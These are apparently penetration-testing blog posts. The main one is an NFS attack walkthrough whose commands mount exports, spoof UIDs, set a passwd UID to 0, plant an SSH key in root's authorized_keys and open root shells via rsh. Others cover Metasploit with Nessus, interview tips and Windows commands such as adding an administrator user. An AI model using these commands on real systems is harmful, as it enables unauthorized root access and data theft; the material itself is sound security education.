NFS

NFS stands for Network File System and is a protocol which can be found in Unix systems that allows a user on a network to access shared folders in a manner similar to local storage. Modern NFS implementations contain features to prevent misuse of exported folders however there are NFS services in legacy systems which are not configured properly and they can abused.

Discovery of NFS Service

The NFS service is running on port 2049/TCP therefore it can be discovered during the port scanning activities in a penetration test with Nmap.

2049/tcp open nfs 2-4 (RPC #100003)
NFS - Discovery with Nmap

NFS – Discovery with Nmap

On top of that the rpcinfo utility can be used to determine if there are any mountd and NFS services running on the host.

rpcinfo -p IP
NFS - NFS and Mountd Services

NFS – NFS and Mountd Services

List Exported Folders

The following command will retrieve the list of the exported folders for a given host. This information will be used for accessing these folders.

showmount -e IP
NFS - Retrieve Exported Folders

NFS – Retrieve Exported Folders

When the showmount command is used with the following parameters can retrieve further information such as:

  • Mount Points
  • Connected Hosts
  • Directories
showmount IP // Connected Hosts
showmount -d IP // Directories
showmount -a IP // Mount Points
NFS - Showmount Commands

NFS – Showmount Commands

Alternatively Metasploit Framework has a module which can be used to list exported folders.

auxiliary/scanner/nfs/nfsmount
NFS - Retrieve Exported Folders Metasploit

NFS – Exported Folders via Metasploit

There is also a utility called NFS Shell which can connect to NFS shares and identify common security problems manually. However it requires the following dependencies to be installed first:

apt-get install libreadline-dev libncurses5-dev
make
gcc -g -o nfsshell mount_clnt.o mount_xdr.o nfs_prot_clnt.o nfs_prot_xdr.o nfsshell.o -L/usr/local/lib -lreadline -lhistory -lncurses
./nfsshell

The list of the exported folders can obtained with the following commands:

nfs> host IP // Connects to NFS Server
nfs> export // Export NFS List
NFS - Retrieve Exported Folders NFS Shell

NFS – Retrieve Exported Folders via NFS Shell

Accessing NFS Shares

The exported folders can be accessed by creating an empty local folder and mounting the share to this folder as per the example below:

mkdir /temp/
mount -t nfs 192.168.1.172:/ /temp -o nolock
NFS - Mount Shared Directory

NFS – Mount NFS Directory

Verification that the share has been mounted successfully can achieved with the following command which will list all the local drives.

df -h
NFS - Display Mounted Folder as Local Drive

NFS – Display Mounted Folder as Local Drive

The share can be accessed like any other local folder on the system.

cd /temp/
ls
NFS - Listing Folder Contents of NFS Share

NFS – Listing Folder Contents of NFS Share

UID Manipulation

If there are any files on the exported share that the user doesn’t have permission to read them then it might be possible to trick the NFS server to believe that the user account that tries to read the file is the owner of the file. This can achieved by performing UID (User ID) manipulation.

NFS - Permission Denied

NFS – Permission Denied

The following command will display the UID (User ID) and the GUID (Group ID) of the file owner.

ls -al
NFS - Retrieving the UID

NFS – Retrieving the UID

A new user will need to be created locally which will have the same UID and name with the file owner.

useradd <user>
passwd <user>

The UID can be changed from the passwd file.

vi /etc/passwd
NFS - Modifying the UID via Passwd File

NFS – Modifying the UID via Passwd File

From the mounted folder by executing the su command with the password that is known since it has been created previously the current user will switch to the new user.

su <useraccount>
NFS - UID Manipulation

NFS – UID Manipulation

Since the UID of the file will be the same with the UID of the new user, the system will believe that this is the original owner so it would be possible to read the contents of the file.

This is due because the exported folder doesn’t have the root_squash option set which will map the UID and GID of the user that is accessing the NFS folder to anonymous UID/GID. For example the root user ID of a host that is trying to access a share will be replaced by the user ID nobody on the NFS server to prevent escalation of privileges.

The root_squash option can be enabled or disabled from the following location:

vi /etc/exports
/home 192.168.1.47(root_squash) // Enables Root Squash
/home 192.168.1.47(no_root_squash) // Disables Root Squash

If the passwd file has write permissions then by changing the UID of a non-privileged user to 0 will give him root level access.  The UID of the username service has been modified to 0 which is the UID of the root user to demonstrate this issue.

NFS - UID Modification to 0

NFS – UID Modification to 0

Authenticating again with the server via SSH will give the user service root access privileges.

NFS - Service User Becomes Root

NFS – Service User Becomes Root

Shell Access

Depending on the files that are stored in the exported folder it might be possible to obtain shell access via SSH or RSH and Rlogin. Interesting files to examine are:

  • authorized_keys
  • rhosts

Both files are hidden therefore from the NFS folder the following command will determine the presence of these files.

ls -al
NFS - Hidden Files Rhosts and SSH

NFS – Hidden Files Rhosts and SSH

Generating an SSH key pair and adding the public key into the list of authorized keys will allow a user to connect via SSH on the NFS server.

cd /root/.ssh/
ssh-keygen -t rsa -b 4096
cp /root/.ssh/id_rsa.pub /temp/root/.ssh/
cat id_rsa.pub >> /temp/root/.ssh/authorized_keys
ssh -i /root/.ssh/id_rsa root@192.168.1.189
NFS - Generating SSH Key Pair

NFS – Generating SSH Key Pair

NFS - Authorised Keys SSH Connection

NFS – Authorised Keys SSH Connection

The .rhosts clarifies which remotes hosts or users can access a local account on the system. If the contents of the .rhosts file are the ++ sign this means that it allows connections from any host on the network and from any username.

cat .rhosts
++
NFS - Display Rhosts

NFS – Display Rhosts Contents

The following commands will allow the root user of the system to connect on the target directly as the system will not prompt for a password since all the users are trusted from all systems.

rsh -l root IP
rlogin -l root IP
NFS - Shell Access via rsh

NFS – Shell Access via rsh

NFS - Shell Access via rlogin

NFS – Shell Access via rlogin

Alternatively if the contents of the .rhosts are different then examining the file will assist to determine which hosts and which users are trusted and therefore can authenticate without password.

Advertisements

Metasploit and Nessus

Metasploit provides flexibility to penetration testers as it can support some of the most important tools inside the framework like Nessus and Nmap. You can initiate Nessus scans directly from the metasploit console, import existing scans and actually operate Nessus from inside the framework.

The main advantage is that the information is centralized between these tools since Nessus and Nmap scans are stored in the Metasploit database in an organized manner. Therefore it is possible to launch a Nessus scan via Metasploit, identify a vulnerability and then execute the appropriate exploit without leaving the framework and saving pentesting time.

The first step is to start and connect the postgresql database to Metasploit:

screenshot-from-2016-09-26-03-40-28

Starting the Database and Verification of Connectivity

If the database is not created you can initiate it with the following command:

screenshot-from-2016-09-27-11-49-14

Building the Metasploit Database

Then you can load the Nessus plugin:

screenshot-from-2016-09-26-13-58-59

Load Nessus Inside Metasploit

Before you can operate Nessus via Metasploit you need to authenticate with your existing credentials:

screenshot-from-2016-09-26-03-46-50

Nessus Authentication via Metasploit

Metasploit requires the policy UUID before the creation of a new nessus scan and the scan ID in order to execute it:

launching-nessus-scans-metasploit

Launching a Nessus Scan

When the scan is finished the list of vulnerabilities that Nessus has discovered can be generated:

list-vulnerabilities-nessus-metasploit

Listing Nessus Vulnerabilities

Metasploit can divide also the number of findings by host and criticality:

list-of-issues-by-host-nessus-metasploit

List of Findings by Host

Existing Nessus scans can also imported to Metasploit.

screenshot-from-2016-09-28-21-02-44

Importing existing Nessus Scan to Metasploit Database

Running Nessus or Nmap via Metasploit in a large pentest can help the penetration tester to manage his results effectively, save project time and therefore to conduct a quality assessment.

List of Tools for Pentest Rookies

It is difficult sometimes for someone without any experience that he wants to join the field of the penetration testing to establish which tools he should know as a starting point. Based on what the industry usually expects from rookies during the interview or in their first year if they join the company that is hiring, the following list has been created as a pointer with the most common tools.

These tools can cover the basics in an infrastructure and in a web application penetration test. Of course all of these should be used in a safe lab environment and not across the Internet.

Interview Tips

An interview is an opportunity for someone to chase something better for his career. It is the time that he needs to shine and demonstrate that he has the professional behaviour. Being professional it means two things: responsibility and maturity.

There are some generic rules that every interviewee should follow in order to impress and increase his possibilities to have a job offer. Except of the technical knowledge a good candidate should focus on the below:

  • Think before you answer any question
  • Know your CV fully and be ready to respond about it
  • Wear professional clothes
  • Arrive at least 10-15 minutes before the interview
  • Perform a background check on the company
  • Perform a background check on the interviewer
  • Give clear answers and concise
  • If you don’t know an answer admit it
  • If you don’t understand a question ask for clarifications
  • Be ready to ask questions about the role and the company
  • Be polite and enthusiastic
  • Thank the interviewer for his time at the end of the interview

Common Windows Commands for Pentesters

Every penetration tester should be fluent with the Windows command prompt since various commands could be used in different stages of a penetration test like domain recon and post exploitation.

Of course there are plenty of windows commands to use and the purpose of this post is not to cover all of them but only those that are needed during an exam certification, interview or a basic penetration test.

The following commands are considered the most common:

  • whoami – List the current user
  • net share – View current network shares
  • net use X: \\IP_Address\c$ – Mount a remote network share
  • net localgroup – Retrieve the local groups
  • net localgroup Administrators – Retrieve local administrators
  • net user pentestuser pentestpass /add – Add a new user to the current host
  • net localgroup Administrators pentestuser /add – Add pentestuser to the local administrators group
  • net user pentestuser /domain – View information about a domain user
  • net group “Domain Admins” /domain – Retrieve domain administrators
  • net config server/workstation – View the domain name of current host
  • net view – List all hosts in the current workgroup or domain
  • net view /domain – List all domains available
  • net user /domain – List all the domain users

Practical Skills for Technical Interviews

If your job interview requires a practical component then you need to prepare in certain areas. Obviously due to time constraints it is not possible for a candidate to cover everything in his preparation and future employers doesn’t expect that as well. However candidates need to demonstrate that they know how to perform basic penetration testing activities up to level and are confident.

Employers usually they are looking for candidates that they know already how to perform the basics as it will take less working time to train them and they can be billable faster.

The following skills are required for almost any technical interview:

Infrastructure

  • Scan a Subnet Network to Identify Hosts
  • Nmap – TCP/UDP scan and Service and Version Detection
  • Metasploit – Search and Configure Modules
  • Meterpreter – Dump hashes and Privilege Escalation
  • Unix – NFS Export, Connect to a Share Folder, Telnet Authentication Bypass
  • Windows – Netapi vulnerability
  • Database – xp_cmdshell

Web Application

  • Authentication Bypass
  • Modify Cookie Values
  • Reflected and Stored Cross Site Scripting
  • SQL Injection
  • Command Execution
  • File Inclusion (RFI and LFI)

 

List of Pentest Blogs to Follow

Most of the penetration testers have their own blog or website where they share their research, techniques or personal tools. Keeping a list of well-known blogs to follow it will allow you to learn about a specific technique which it cannot be found on books or a new script that will assist you during your daily penetration testing activities.

Below is a list of some of the most popular blogs which are recommended to follow and read: